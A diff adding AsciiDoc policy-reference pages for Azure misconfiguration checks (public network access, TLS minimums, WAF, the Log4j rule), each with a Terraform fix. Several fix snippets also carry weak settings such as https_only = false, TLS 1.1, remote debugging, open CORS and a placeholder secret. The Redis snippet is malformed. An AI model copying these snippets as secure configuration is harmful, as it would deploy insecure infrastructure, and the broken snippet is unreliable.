+resource "azurerm_cognitive_account" "examplea" {
+  name                          = "example-account"
+  location                      = var.resource_group.location
+  resource_group_name           = var.resource_group.name
+  kind                          = "Face"
+  public_network_access_enabled = false
+  sku_name                      = "S0"
+}
+----
+
diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-databricks-workspace-is-not-public.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-databricks-workspace-is-not-public.adoc
new file mode 100644
index 000000000..39f9fd91f
--- /dev/null
+++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-databricks-workspace-is-not-public.adoc
@@ -0,0 +1,61 @@
+== Azure Databricks workspace is public
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| c4997cfc-33ae-4277-b9f1-41b614b1ba31
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/DatabricksWorkspaceIsNotPublic.py[CKV_AZURE_158]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform
+
+|===
+
+
+
+=== Description
+
+
+Disabling the public network access property improves security by ensuring your Azure 
Databricks workspace can only be accessed from a private endpoint.
+This configuration strictly disables access from any public address space outside of the Azure IP range and denies all logins that match IP or virtual network-based firewall rules.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* azurerm_databricks_workspace
+* *Arguments:* public_network_access_enabled
+
+
+[source,go]
+----
+resource "azurerm_databricks_workspace" "pass" {
+  name                          = "databricks-test"
+  resource_group_name           = azurerm_resource_group.example.name
+  location                      = azurerm_resource_group.example.location
+  sku                           = "standard"
+  public_network_access_enabled = false
+
+  tags = {
+    Environment = "Production"
+  }
+}
+----
+
diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-function-app-uses-the-latest-version-of-tls-encryption.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-function-app-uses-the-latest-version-of-tls-encryption.adoc
new file mode 100644
index 000000000..3130061c0
--- /dev/null
+++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-function-app-uses-the-latest-version-of-tls-encryption.adoc
@@ -0,0 +1,71 @@
+== Azure Function app does not use the latest version of TLS encryption
+
+
+=== Policy Details
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 7c24e2c1-3ef1-49bf-aaf4-f1a8e5459186
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py[CKV_AZURE_145]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|Terraform
+
+|===
+
+
+
+=== Description
+
+The Transport Layer Security (TLS) protocol secures transmission of data between servers and web browsers over the Internet using standard encryption technology. 
+To follow security best practices and the latest PCI compliance standards, enable the latest version of the TLS protocol (i.e., TLS 1.2) for all your Azure Function apps.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* azurerm_function_app
+* *Arguments:* site_config.min_tls_version
+
+
+[source,go]
+----
+resource "azurerm_function_app" "pass2" {
+  name                       = "test-azure-functions"
+  location                   = azurerm_resource_group.example.location
+  resource_group_name        = azurerm_resource_group.example.name
+  app_service_plan_id        = azurerm_app_service_plan.example.id
+  storage_account_name       = azurerm_storage_account.example.name
+  storage_account_access_key = azurerm_storage_account.example.primary_access_key
+  https_only                 = false
+
+  site_config {
+    dotnet_framework_version = "v4.0"
+    scm_type                 = "LocalGit"
+    min_tls_version          = "1.2"
+    ftps_state               = "AllAllowed"
+    http2_enabled            = false
+    cors {
+      allowed_origins = ["*"]
+    }
+  }
+}
+----
+
diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-http-port-80-access-from-the-internet-is-restricted.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-http-port-80-access-from-the-internet-is-restricted.adoc
new file mode 100644
index 000000000..fc5066c13
--- /dev/null
+++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-http-port-80-access-from-the-internet-is-restricted.adoc
@@ -0,0 +1,60 @@
+== Azure HTTP (port 80) access from the internet is not restricted
+
+
+=== Policy Details
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 85be5381-9513-450c-8b26-f5f5f638af46
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleHTTPAccessRestricted.py[CKV_AZURE_160]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform
+
+|===
+
+
+
+=== Description
+
+Restricting access to Azure HTTP (port 80) from the internet can help 
improve the security of your resources.
+Port 80 is used for HTTP traffic, and allowing access to it from the internet can expose your resources to potential security threats, such as malware, data breaches, and unauthorized access.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* azurerm_network_security_rule
+* *Arguments:* destination_port_range
+
+
+[source,go]
+----
+resource "azurerm_network_security_rule" "https" {
+  name                        = "example"
+  access                      = "Allow"
+  direction                   = "Inbound"
+  network_security_group_name = azurerm_network_security_group.example.name
+  priority                    = 100
+  protocol                    = "Tcp"
+  resource_group_name         = azurerm_resource_group.example.name
+
+  destination_port_range = "443"
+  source_address_prefix  = "Internet"
+}
+----
+
diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-machine-learning-workspace-is-not-publicly-accessible.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-machine-learning-workspace-is-not-publicly-accessible.adoc
new file mode 100644
index 000000000..77a330ba0
--- /dev/null
+++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-machine-learning-workspace-is-not-publicly-accessible.adoc
@@ -0,0 +1,67 @@
+== Azure Machine Learning Workspace is publicly accessible
+
+
+=== Policy Details
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 9aa11e2f-5491-4782-81f3-a8508bde6366
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/MLPublicAccess.py[CKV_AZURE_144]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform
+
+|===
+
+
+
+=== Description
+
+Disabling the public network access property improves security by ensuring your Azure Machine Learning Workspaces can only be accessed from a private endpoint. 
+This configuration strictly disables access from any public address space outside of the Azure IP range and denies all logins that match IP or virtual network-based firewall rules.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* azurerm_machine_learning_workspace
+* *Arguments:* public_network_access_enabled
+
+
+[source,go]
+----
+resource "azurerm_machine_learning_workspace" "ckv_unittest_pass" {
+  name                          = "example-workspace"
+  location                      = azurerm_resource_group.example.location
+  resource_group_name           = azurerm_resource_group.example.name
+  application_insights_id       = azurerm_application_insights.example.id
+  key_vault_id                  = azurerm_key_vault.example.id
+  storage_account_id            = azurerm_storage_account.example.id
+  public_network_access_enabled = false
+
+  identity {
+    type = "SystemAssigned"
+  }
+
+  encryption {
+    key_vault_id = azurerm_key_vault.example.id
+    key_id       = azurerm_key_vault_key.example.id
+  }
+}
+----
+
diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-postgresql-uses-the-latest-version-of-tls-encryption.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-postgresql-uses-the-latest-version-of-tls-encryption.adoc
new file mode 100644
index 000000000..87ecb3c42
--- /dev/null
+++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-postgresql-uses-the-latest-version-of-tls-encryption.adoc
@@ -0,0 +1,57 @@
+== Azure PostgreSQL does not use the latest version of TLS encryption
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 60cb4ec2-7c4b-446d-a8a8-715172aa0974
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/PostgreSQLMinTLSVersion.py[CKV_AZURE_147]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform
+
+|===
+
+
+
+=== Description
+
+
+The Transport Layer Security (TLS) protocol secures transmission of 
data between servers and web browsers, over the Internet, using standard encryption technology. +To follow security best practices and the latest PCI compliance standards, enable the latest version of the TLS protocol (i.e. +TLS 1.2) for all your PostgreSQL servers. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_postgresql_server +* *Arguments:* ssl_minimal_tls_version_enforced + + +[source,go] +---- +resource "azurerm_postgresql_server" "example" { + name = "example" + + public_network_access_enabled = true + ssl_enforcement_enabled = true + ssl_minimal_tls_version_enforced = "TLS1_2" +} +---- + diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-redis-cache-uses-the-latest-version-of-tls-encryption.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-redis-cache-uses-the-latest-version-of-tls-encryption.adoc new file mode 100644 index 000000000..548b8ad05 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-redis-cache-uses-the-latest-version-of-tls-encryption.adoc @@ -0,0 +1,71 @@ +== Azure Redis Cache does not use the latest version of TLS encryption + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| d4827453-7559-4044-96fe-786493016357 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/RedisCacheMinTLSVersion.py[CKV_AZURE_148] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +The Transport Layer Security (TLS) protocol secures transmission of data between servers and web browsers, over the Internet, using standard encryption technology. +To follow security best practices and the latest PCI compliance standards, enable the latest version of the TLS protocol (i.e.
+ +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_redis_cache +* *Arguments:* minimum_tls_version + + +[source,go] +---- +{ + "resource "azurerm_redis_cache" "pass" { + name = "timeout-redis" + location = "West Europe" + resource_group_name = azurerm_resource_group.example_rg.name + subnet_id = azurerm_subnet.example_redis_snet.id + + family = "P" + capacity = 1 + sku_name = "Premium" + shard_count = 1 + + enable_non_ssl_port = false + minimum_tls_version = "1.2" + public_network_access_enabled = true + + redis_configuration { + enable_authentication = true + maxmemory_policy = "volatile-lru" + } + +}", +} +---- + diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-spring-cloud-api-portal-is-enabled-for-https.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-spring-cloud-api-portal-is-enabled-for-https.adoc new file mode 100644 index 000000000..b41643ec3 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-spring-cloud-api-portal-is-enabled-for-https.adoc @@ -0,0 +1,58 @@ +== Azure Spring Cloud API Portal is not enabled for HTTPS + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 82feaacd-2f2a-42ee-a6bd-f20d36f20489 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/SpringCloudAPIPortalHTTPSOnly.py[CKV_AZURE_161] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + +Enabling HTTPS for your Azure Spring Cloud API Portal can help improve the security of your API portal. +HTTPS is a secure protocol that encrypts data in transit, and using it can help prevent attackers from intercepting and reading your data. 
+ +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_spring_cloud_api_portal +* *Arguments:* https_only_enabled + + +[source,go] +---- +resource "azurerm_spring_cloud_api_portal" "example" { + name = "default" + spring_cloud_service_id = azurerm_spring_cloud_service.example.id + gateway_ids = [azurerm_spring_cloud_gateway.example.id] + https_only_enabled = true + public_network_access_enabled = true + instance_count = 1 + sso { + client_id = "test" + client_secret = "secret" + issuer_uri = "https://www.example.com/issueToken" + scope = ["read"] + } +} +---- + diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-spring-cloud-api-portal-public-access-is-disabled.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-spring-cloud-api-portal-public-access-is-disabled.adoc new file mode 100644 index 000000000..1057f0c08 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-spring-cloud-api-portal-public-access-is-disabled.adoc @@ -0,0 +1,61 @@ +== Azure Spring Cloud API Portal Public Access Is Enabled +// Azure Spring Cloud API Portal public access enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| e3fc2a79-0fb0-45ab-97f4-302fab481ec4 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/SpringCloudAPIPortalPublicAccessIsDisabled.py[CKV_AZURE_162] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +Disabling the public network access property improves security by ensuring your Spring Cloud API Portals can only be accessed from a private endpoint. +This configuration strictly disables access from any public address space outside of the Azure IP range and denies all logins that match IP-based or virtual network-based firewall rules.
+ +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_spring_cloud_api_portal +* *Arguments:* public_network_access_enabled (default is "false") + + +[source,go] +---- +resource "azurerm_spring_cloud_api_portal" "example" { + name = "default" + spring_cloud_service_id = azurerm_spring_cloud_service.example.id + gateway_ids = [azurerm_spring_cloud_gateway.example.id] + https_only_enabled = false + public_network_access_enabled = false + instance_count = 1 + sso { + client_id = "test" + client_secret = "secret" + issuer_uri = "https://www.example.com/issueToken" + scope = ["read"] + } +} +---- + diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-web-app-redirects-all-http-traffic-to-https-in-azure-app-service-slot.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-web-app-redirects-all-http-traffic-to-https-in-azure-app-service-slot.adoc new file mode 100644 index 000000000..d1daee652 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-azure-web-app-redirects-all-http-traffic-to-https-in-azure-app-service-slot.adoc @@ -0,0 +1,75 @@ +== Azure web app does not redirect all HTTP traffic to HTTPS in Azure App Service Slot + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 5f1492e8-2667-431e-b60a-6a0e6ec5c117 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppServiceSlotHTTPSOnly.py[CKV_AZURE_153] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + +Redirecting all HTTP traffic to HTTPS for your Azure web app in the App Service slot can help improve the security of your app. +HTTPS is a secure protocol that encrypts data in transit, and using it can help prevent attackers from intercepting and reading your data.
+ +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_app_service_slot +* *Arguments:* https_only + + +[source,go] +---- +resource "azurerm_app_service_slot" "example" { + name = random_id.server.hex + app_service_name = azurerm_app_service.example.name + location = azurerm_resource_group.example.location + resource_group_name = azurerm_resource_group.example.name + app_service_plan_id = azurerm_app_service_plan.example.id + + https_only = true + min_tls_version = "1.1" # the default is 1.2 + remote_debugging_enabled = true # the default is false + + site_config { + dotnet_framework_version = "v4.0" + } + + app_settings = { + "SOME_KEY" = "some-value" + } + + connection_string { + name = "Database" + type = "SQLServer" + value = "Server=some-server.mydomain.com;Integrated Security=SSPI" + } +} +---- + diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-cosmos-db-accounts-have-restricted-access.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-cosmos-db-accounts-have-restricted-access.adoc new file mode 100644 index 000000000..455230a73 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-cosmos-db-accounts-have-restricted-access.adoc @@ -0,0 +1,58 @@ +== Cosmos DB accounts do not have restricted access +// Azure Cosmos DB account access unrestricted + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| a778e484-5b56-47ad-b51a-12cd8f688e92 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/CosmosDBAccountsRestrictedAccess.py[CKV_AZURE_99] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform, TerraformPlan + +|=== + + + +=== Description + + +Cosmos DB is a globally distributed database service that provides multiple ways to secure and protect your data, such as network isolation, virtual
networks, Azure Private Link, and Azure AD authentication. +By restricting access to your Cosmos DB account, you can control who can access your database and what actions they can perform on it. +By ensuring that your Cosmos DB accounts have restricted access, you can help to improve the security of your database and protect it from unauthorized access or attacks. +This can help to ensure that your database is secure and available for your users. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_cosmosdb_account +* *Arguments:* public_network_access_enabled + + +[source,go] +---- +resource "azurerm_cosmosdb_account" "db" { + ... + + public_network_access_enabled = false + ... +} +---- + diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-front-door-waf-prevents-message-lookup-in-log4j2.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-front-door-waf-prevents-message-lookup-in-log4j2.adoc new file mode 100644 index 000000000..a3c39ecc1 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-front-door-waf-prevents-message-lookup-in-log4j2.adoc @@ -0,0 +1,74 @@ +== Azure Front Door Web Application Firewall (WAF) policy rule for Remote Command Execution is disabled +// Azure Front Door Web Application Firewall (WAF) policy rule for Remote Command Execution disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 17b5c119-cfce-482b-8c72-ead2bc5e333f + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/FrontDoorWAFACLCVE202144228.py[CKV_AZURE_133] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform, TerraformPlan + +|=== + + + +=== Description + + +Using a vulnerable version of the Apache Log4j library might enable attackers to exploit a Lookup mechanism that supports making requests using special
syntax in a format string, which can potentially lead to risky code execution, data leakage, and more. +Set your Front Door Web Application Firewall (WAF) to prevent execution of this mechanism using the rule definition below. +Azure WAF has updated Default Rule Set (DRS) versions 1.0 and 1.1 with rule 944240 "`Remote Command Execution`" under Managed Rules to help in detecting and mitigating this vulnerability. +This rule is already enabled by default in block mode for all existing WAF Default Rule Set configurations. +Learn more at https://nvd.nist.gov/vuln/detail/CVE-2021-44228[CVE-2021-44228]. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_frontdoor_firewall_policy + + +[source,go] +---- +resource "azurerm_frontdoor_firewall_policy" "example" { + name = "example" + resource_group_name = "example" + + managed_rule { + type = "Microsoft_DefaultRuleSet" + version = "1.1" + + override { + rule_group_name = "JAVA" + + rule { + action = "Block" + enabled = true + rule_id = "944240" + } + } + } +} +---- + diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-public-network-access-enabled-is-set-to-false-for-mysql-servers.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-public-network-access-enabled-is-set-to-false-for-mysql-servers.adoc new file mode 100644 index 000000000..230cb3adc --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-public-network-access-enabled-is-set-to-false-for-mysql-servers.adoc @@ -0,0 +1,55 @@ +== 'public network access enabled' is not set to 'False' for MySQL servers +// MySQL servers enable public network access + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 0224a383-4c7c-4dca-b52c-f6fab8014666 + +|Checkov Check ID +|
https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/MySQLPublicAccessDisabled.py[CKV_AZURE_53] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Terraform, TerraformPlan + +|=== + + + +=== Description + + +By disabling public network access and only allowing connections from trusted IP addresses or networks, you can help to mitigate the risk of external attacks and ensure that only authorized users and systems are able to connect to the MySQL server. +This can help to protect the server and its data from unauthorized access or attacks, and can help to maintain the confidentiality, integrity, and availability of the server and its resources. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_mysql_server +* *Arguments:* public_network_access_enabled + + +[source,go] +---- +resource "azurerm_mysql_server" "example" { + ... ++ public_network_access_enabled = false +} +---- + diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-api-management-services-uses-virtual-networks.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-api-management-services-uses-virtual-networks.adoc new file mode 100644 index 000000000..f81e3b921 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-api-management-services-uses-virtual-networks.adoc @@ -0,0 +1,60 @@ +== API management services do not use virtual networks +// Azure API Management services do not use virtual networks + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 2fe7b111-9608-48a5-8062-7878f8ca9c2e + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/APIServicesUseVirtualNetwork.py[CKV_AZURE_107] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform, TerraformPlan + +|=== + + + +=== Description + + +A virtual network is a
logical network in Azure that is isolated from other networks. +When you configure your API management service to use a virtual network, you can control the inbound and outbound network traffic to and from your service using network security groups (NSGs) and service endpoints. +This can help to improve the security of your service and protect it from unauthorized access or attacks. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_api_management +* *Arguments:* virtual_network_configuration + + +[source,go] +---- +resource "azurerm_api_management" "example" { + ... + + virtual_network_configuration { + subnet_id = azurerm_subnet.subnet_not_public_ip.id + } + + ... +} +---- + diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-application-gateway-enables-waf.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-application-gateway-enables-waf.adoc new file mode 100644 index 000000000..235805cc1 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-application-gateway-enables-waf.adoc @@ -0,0 +1,58 @@ +== Azure application gateway does not have WAF enabled +// Web Application Firewall (WAF) for Azure Application Gateway disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| ff7f6448-42a0-47fd-9e00-cb8b3cf21f0a + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/common/graph/checks_infra/base_check.py[CKV_AZURE_120] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform, TerraformPlan + +|=== + + + +=== Description + + +WAF is a security feature that provides protection for web applications by inspecting incoming traffic and blocking malicious requests before they reach the application.
+When WAF is enabled on an Azure application gateway, it analyzes incoming traffic to the gateway and blocks requests that are determined to be malicious based on a set of rules. +This can help to protect your application from a variety of threats, such as SQL injection attacks, cross-site scripting (XSS) attacks, and other types of attacks. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_application_gateway +* *Arguments:* waf_configuration.enabled + + +[source,go] +---- +resource "azurerm_application_gateway" "network" { + ... ++ waf_configuration { ++ enabled = true ++ } +} +---- + diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-application-gateway-uses-waf-in-detection-or-prevention-modes.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-application-gateway-uses-waf-in-detection-or-prevention-modes.adoc new file mode 100644 index 000000000..13728e247 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-application-gateway-uses-waf-in-detection-or-prevention-modes.adoc @@ -0,0 +1,59 @@ +== Application gateway does not use WAF in Detection or Prevention modes +// Azure Application Gateway does not use Web Application Firewall (WAF) in Detection or Prevention mode + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 3dc2478c-bf25-4383-aaa1-30feb5cda586 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppGWUseWAFMode.py[CKV_AZURE_122] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform, TerraformPlan + +|=== + + + +=== Description + + +WAF has two modes: Detection and Prevention. +In Detection mode, WAF analyzes incoming traffic to the application gateway and logs any requests that are determined to be malicious based on a set of rules.
+This can help you to identify potential security threats and take appropriate action to protect your application. +In Prevention mode, WAF analyzes incoming traffic to the application gateway and blocks any requests that are determined to be malicious based on a set of rules. +This can help to prevent malicious requests from reaching your application and potentially causing damage. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_web_application_firewall_policy +* *Arguments:* policy_settings.enabled + policy_settings.mode + + +[source,go] +---- +resource "azurerm_web_application_firewall_policy" "example" { + ... + policy_settings { ++ enabled = true ++ mode = "Prevention" + request_body_check = true + file_upload_limit_in_mb = 100 + max_request_body_size_in_kb = 128 + } + ... +} +---- + diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-cache-for-redis-disables-public-network-access.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-cache-for-redis-disables-public-network-access.adoc new file mode 100644 index 000000000..0cb47daf2 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-cache-for-redis-disables-public-network-access.adoc @@ -0,0 +1,55 @@ +== Azure cache for Redis has public network access enabled +// Azure Cache for Redis public network access enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 446da765-1694-4f82-a6fe-3e657b5ac3d2 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/RedisCachePublicNetworkAccessEnabled.py[CKV_AZURE_89] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform, TerraformPlan + +|=== + + + +=== Description + + +By ensuring that your Azure cache for Redis is not public, you can help protect your data from unauthorized access or tampering.
+A public Azure cache for Redis is accessible over the internet, which can make it vulnerable to external threats such as hackers or malware. +By making it private, you can help ensure that only authorized users can access the data. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_redis_cache +* *Arguments:* public_network_access_enabled + + +[source,go] +---- +resource "azurerm_redis_cache" "example" { + ... ++ public_network_access_enabled = false + ... +} +---- + diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-cognitive-search-disables-public-network-access.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-cognitive-search-disables-public-network-access.adoc new file mode 100644 index 000000000..76a16492c --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-cognitive-search-disables-public-network-access.adoc @@ -0,0 +1,56 @@ +== Azure cognitive search does not disable public network access +// Azure Cognitive Search enables public network access + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 32e96093-7c64-4618-86e2-832848acbd92 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AzureSearchPublicNetworkAccessDisabled.py[CKV_AZURE_124] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform, TerraformPlan + +|=== + + + +=== Description + + +It is generally a good security practice to ensure that your Azure Cognitive Search instance does not have public network access enabled, as this means that it is only accessible from within your private network. +This can help to protect your search instance from unauthorized access, as external parties will not be able to connect to it over the internet.
+It is especially important to ensure that public network access is disabled if your Azure Cognitive Search instance contains sensitive or confidential data. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_search_service +* *Arguments:* public_network_access_enabled + + +[source,go] +---- +resource "azurerm_search_service" "example" { + ... + + public_network_access_enabled = false +} +---- + diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-container-container-group-is-deployed-into-virtual-network.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-container-container-group-is-deployed-into-virtual-network.adoc new file mode 100644 index 000000000..a208ac599 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-container-container-group-is-deployed-into-virtual-network.adoc @@ -0,0 +1,57 @@ +== Azure container group is not deployed into a virtual network +// Azure Container group not deployed into a virtual network + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| dd2feacf-8890-43e9-ab55-651bf3ae1c03 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AzureContainerGroupDeployedIntoVirtualNetwork.py[CKV_AZURE_98] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform, TerraformPlan + +|=== + + + +=== Description + + +A virtual network is a logical network in Azure that is isolated from other networks. +When you deploy a container group into a virtual network, you can control the inbound and outbound network traffic to and from your container group using network security groups (NSGs) and service endpoints. +This can help to improve the security of your container group and protect it from unauthorized access or attacks.
